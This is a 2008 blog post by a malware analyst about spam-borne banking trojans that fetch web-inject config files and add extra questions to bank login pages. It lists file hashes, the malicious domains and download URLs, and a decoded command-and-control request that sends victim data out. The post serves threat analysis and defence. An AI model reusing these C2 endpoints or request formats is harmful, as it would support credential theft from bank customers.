Sunday, November 16, 2008

Enlisting YOUR BANK to steal your identity

In the past month, we've had three spam campaigns which had one thing in common. They all downloaded files from sergej-grienko.com, and they all "injected" additional questions when you visited your REAL BANK's REAL WEBSITE.

What were the three spam campaigns?

The first was a "You have received an eCard" spam with an ecard.zip attachment. We received around 500 copies of the virus in spam messages between October 1st and October 15th.

The second was a "New anjelina jolie sex scandal" spam with a .zip attachment. We received several versions of this spam - nearly 2,000 copies of the virus - between October 15 and October 27th. The files that we received labeled as "anjelina.zip" on October 15th were very similar to the files we received on October 15th for the ecard.zip.

The third run was "Barak Obama sex scandal" spam with a .zip attachment. These were received on November 10th and 11th, with an attachment named "zeland-01.zip". A similarly configured "new scandal anjelina joly" and "New anjelina jolie sex scandal" was also sent on November 10th, containing an attachment called "ecard.zip", despite the fact that the subject and body suggested something else. zeland-01.zip contained a file called "obama_video.exe".


Oct 1 ecard.exe == 69760de6a852ab59fd18a186a871fc98

Oct 15 e-card.exe == 2521120ff95c2cad5c0b7cd724a0dbb0

Oct 17 Anjelina == 9d40e58d4b91df1fdf7afd3b05dba6d6

Oct 27 anjelina_video.exe == da26039cfcf82b7e8ff659b503cbc9ee

Nov 10 obama_video.exe == bf23b74c51673b6958aa2ffeeca36d1c


The website sergej-grienko.com is in Russia and doesn't run Apache or IIS or any other common webserver. Its running a webserver called "nginx" (Pronounced Engine-X). That's a huge negative right there. Many webservers that host malware are using this webserver type.

One of my malware analysis students brought this domain to my attention first on October 31st. He was analyzing the copy of the malware which claimed to be an "anjelina" video which we had received on October 27th. That video made contact to the servers "popokimoki.com", "laureselignac.com", "sergej-grienko.com", and "ulm-haafeulm-haa.com".

The malware downloaded a "substitution" config file for banking sites. This banking configuration file seemed to be the type used by the so-called "Goldun Trojan" has been around FOREVER -- at least since January 2005 according to Symantec and McAfee.

The Trojan is called a "High Threat" by PCTools:
http://www.pctools.com/mrc/infections/id/Trojan.Goldun/

although Symantec calls it "Risk Level 1: Very Low".

What's the difference in the risk ratings? I believe its primarily a difference between how hard it is to notice the infection vs. how unwise you would have to be to open a .zip file attached to an email and then execute the program it contains. So, there is a "Very Low" risk that someone is going to receive a .zip attachment promising to be a sex video, unpack the zip file, and then run the attached executable. The malware is VERY widely detected, which means even if you were foolish enough to do that, there is a really great chance that the virus would be detected at execution time.

The problem comes in that if you actually DO get infected, you are quite likely to have a severe impact in the form of identity theft, and because of the root-kit technologies implemented in this virus, you won't know you are infected because the virus hides itself from common commands.

We'll look at some of the network traffic from the October 27th version of the anjelina_video.exe and the November 11th version of the obama_video.exe.

The anjelina video is detected almost uniformally as being "Zbot"

The Obama video is detected by a host of names, including "Haxdoor", "Goldun", and GoldSpy" -- Haxdoor (eTrust, Ikarus and Microsoft), Goldun (NOD32, Panda, PCTools), and GoldSpy (DrWeb).

However, our experience is that they both contact the same servers and both do mostly the same thing.

When the anjelina_video was executed, it fetched the file:

http://ulm-haafeulm-haa.com/blotch/1010.bin

and made frequent contacts to the site:

http://sergej-grienko.com/e-bolt/data.php

The .bin file sure looked like a Goldun configuration file to me, so we visited Citibank.com, and sure enough, considerable data about where we had just visited, including our OS, browser, screen resolution, and other information, was sent to sergej-grienko.

The commands used a "trackid=" tag to pass an encoded string of information, such as:

GET /e-bolt/data.php?trackid=706172616D3D636D64266C616E673D454E552669643D37343230267368656C6C3D3026736F636B73706F72743D30267665723D392668747470706F72743D3026757074696D656D3D323726757074696D65683D31267569643D5B43363635454438323642364638413346385D HTTP/1.0

which translates to:
param=cmd&lang=ENU&id=7420&shell=0&socksport=0&ver=9&httpport=0&uptimem=27&uptimeh=1&uid=[censored]


While the Anjelina malware fetched a data file

The Obama_video fetched a data file called:

http://sergej-grienko.com/inj/0611nociti.bin

We set up a working theory that the ".bin" file was being named for the data of its creation, European style, so that the "1010.bin" was created October 10th, the "0611nociti.bin" was created on November 6th. This seemed to be confirmed when on November 11th, the file being downloaded switched to "1111.bin".

What was the purpose of the .bin files?

When visiting websites, the ".bin" file was consulted at each URL to determine whether the URL typed in the browser matched a URL pattern in the configuration file. If there was a match, the webpage was then searched, before displaying to the user, to see whether a particular pattern ON THE FETCHED WEBPAGE was found. If that pattern was found, then additional information was inserted into the webpage.

Using the November 11th configuration file, we took "infected vs. clean" screenshots while visiting 32 different banking login pages that were found in the configuration file. In 28 of the cases, the webpage on the infected computer asked the user to provide additional information while logging on.

All of the information provided (and much more data as well) was stored in a keylog recording file, which was periodically sent to the hacker.

Here are some example "Before and After" pictures. The banks that were tested included:

(53) Fifth Third Bank
Bangor
Bank of America
Bank of Hawaii
Bank of the West
BB&T
California Bank
Capital One
Citizens Bank
East West Bank
First American Bank
First American Trust
First Bank
First Business
First Citizens
First Merit Bank
First Niagra Bank
Frost Bank
Huntington Bank
M&T Bank
Metro National Bank
National Bank of Arizona
PNC Bank
Regions Bank
TD Bank North
WAMU
Webster Online

Image clean-up and sizing underway. Full images of all are available by request to law enforcement and qualified researchers as part of the full report on this subject
















No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.